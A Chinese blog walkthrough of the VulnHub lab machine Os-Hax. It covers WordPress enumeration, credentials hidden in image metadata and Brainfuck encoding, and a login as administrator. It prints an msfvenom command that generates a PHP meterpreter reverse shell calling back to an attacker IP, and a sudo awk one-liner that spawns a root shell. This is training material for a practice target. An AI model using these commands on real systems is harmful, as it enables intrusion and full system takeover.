靶机渗透日记 hackNos: Os-Hax

已于 2022-03-02 15:06:50 修改
阅读量253 收藏
点赞数
文章标签: 安全 web安全 渗透测试
于 2022-02-07 10:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/122801971
版权

文章目录

信息收集

  1. ip
    在这里插入图片描述

  2. 端口
    在这里插入图片描述

  3. 目录扫描
    在这里插入图片描述

    发现存在 wordpress

  4. 使用 wpscan

    在这里插入图片描述

    发现存在 web 用户

    在这里插入图片描述

    在这里插入图片描述

    没有发现插件

  5. 在 /img 目录下存在 flaghost.png
    在这里插入图片描述

  6. 用exiftool查看了一下图片信息

    exiftool flaghost.png

    在这里插入图片描述

  7. 可能是 web 用户的密码,尝试后发现是路径信息,访问 /passw@45 出现 flag2.txt , 内容如下

    在这里插入图片描述

    搜索得知这是 Brainfuck 编码

    解密后得到 web:Hacker@4514

  8. 此时可以登录到 wordpress 后台,发现 web 用户是 Administrator 权限

Getshell

这里可以使用两种方法getshell

方法一

修改模板反弹shell

使用MSF生成反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.154.128 lport=4444 > shell.php

在这里插入图片描述

方法二

命令执行

通过修改前端绕过长度限制

在这里插入图片描述

提权

在这里插入图片描述

尝试 web 账号密码登录

在家目录得到flag3

在这里插入图片描述

发现可以以 root 用户执行 awk 命令

在这里插入图片描述

执行命令

sudo awk 'BEGIN {system("/bin/sh")}'

在这里插入图片描述

# .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub—Os-Hax
weixin_39219503的博客
01-05 395
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 题目信息如下,难度中等 Back To The Top Difficulty : Intermediate Flag : boot-root Learing : exploit | web application Security | Privilege Es...
oscp——hackNos: Os-Hax
王嘟嘟的博客
02-03 827
0x00 前言 这个是第十九台机子了, 不知不觉已经做了这么多东西了。 最后,我们来一个现学现用 Dear E-Commerce professional ; This letter was specially selected to be sent to you . We will comply with all removal requests ! This mail is being sen...
Os-Hax靶机测试
weixin_58729813的博客
04-08 275
本文是针对vulnhub靶机测试,拿到两个flag即可
Vulnhub-Os-hax
wwxxss
03-16 154
使用strings查看图片的信息 strings 命令在对象文件或二进制文件中查找可打印的字符串。gobuster dir -iu "http:192.168.56.106/" -w 字典 -x 格式( html,txt,bak,php)根据提示我们可以发现是一个wordpress站点,所以我们可以扫描wordpress站点下的目录。结果并没有什么发现,通过wp发现在根目录下有个img目录有个flaghost.png,我们使用。得到了一个brainfuck加密的密码,我们丢到解密网站解开查看。
靶机Os-Hax测试笔记
qq_56426046的博客
01-05 507
下载ova文件,直接virtual Box打开,可能出现一些问题,关闭USB选择网络模式等等。网络用桥接,开启过程没有失败,可以访问网站代表搭建成功。首先编辑 vi /etc/hosts 192.168.1.102 localhost 访问。访问目录 /img/发现存在目录写浏览。修改/etc/sudoers 文件。修改/etc/sudoers 文件。切换 python shell。
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
2021-06-13OS-Hax靶机学习
qq_45290991的博客
06-13 432
靶机地址 难度:初级 靶机发布日期:2019年11月1日 靶机描述:Contact… https://www.linkedin.com/in/rahulgehlaut/ For any Error This works better in VirtualBox than VM...
vulnhub靶场,Os-hackNos-1
kukudeshuo的博客
07-18 528
vulnhub靶场,Os-hackNos-1 环境准备 攻击机:kali(192.168.58.130) 靶机Os-hackNos-1(192.168.58.156) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.156 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 就是一个ubuntu系统的默认ht
『VulnHub系列』hackNos: Os-hackNos-Walkthrough
ins1ght的博客
11-22 1101
靶机发布日期:2019年11月3日,难度:初级。目录枚举之后发现drupal和alexander.txt。对alexander.txt中的内容先后进行base64解码、brainfuck解码后得到账号密码(没用上)。火狐插件Wappalyzer发现drupal版本是7,MSF直接getshell。之后发现SUID权限的wget。
vulnhub靶场之hackNosOs-Bytesec
qq_34613171的博客
02-13 499
难度:中级 标记:2标记第一个用户和第二个根 学习:利用| 中小企业| 枚举 速记| 特权提升 联系…https://www.linkedin.com/in/rahulgehlaut/ 我们建议您对此虚拟机使用VirtualBox而不是VMware 做了端口扫描,发现开了 80 ,139 ,445 ,2525 这里可能有SMB共享。 2525是SSH。 查看页面源代码 ,发现提示 get s...
『VulnHub系列』Os-Hax: 1-Walkthrough
ins1ght的博客
11-12 1041
靶机发布日期:2019年11月1日,难度:初级。目录猜解之后发现了flaghost.png,exiftool发现了passw@45。访问passw@45目录之后得到Brainfuck编码的WordPress用户名和密码,登录后台之后在404.php中写入反弹shell的代码。
vulnhub靶机Os-hackNos
timesleep的博客
12-13 496
我们的靶机IP为192.168.34.152 kali的IP为192.168.34.175 我们先扫描 我们访问一下80顺带扫一下目录 我们看到有drupal我们先看一下是什么版本 然后我们查了一个exp 好我们把他下载出来 git clone https://github.com/dreadlocked/Drupalgeddon2.git gem install highline ./...
vulnhub靶机 Os-Hax
最新发布
qq_52178795的博客
06-18 108
本篇重点,反弹shell awk提权
symfonos靶机
haha1314的博客
08-10 768
一、 信息收集 存活主机 开放端口 Enum4linux 猜测aeolus可能为用户名 尝试爆破:sergioteamo 登陆 4 转到msf里面 在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接 这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内, 然后访问自己的9000端...
Vulhub渗透测试 OSHAX
weixin_44687621的博客
08-23 260
下载靶机https://www.vulnhub.com/entry/hacknos-os-hax,389/ 导入到virtualbox后,将靶机网络改为仅主机模式,将usb2.0改成usb1.0 使用nmap扫描靶机ip 查看开放了哪些端口 查看端口详细信息 nmap -sS -sV -T5 -A 192.168.56.106 当前靶机开放了22和80端口,首先以80的web服务,尝试先获取webshell。 先查看一下主页,发现啥也没有,进行目录扫描。 访问img目录,发现目录下面有flaghos
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值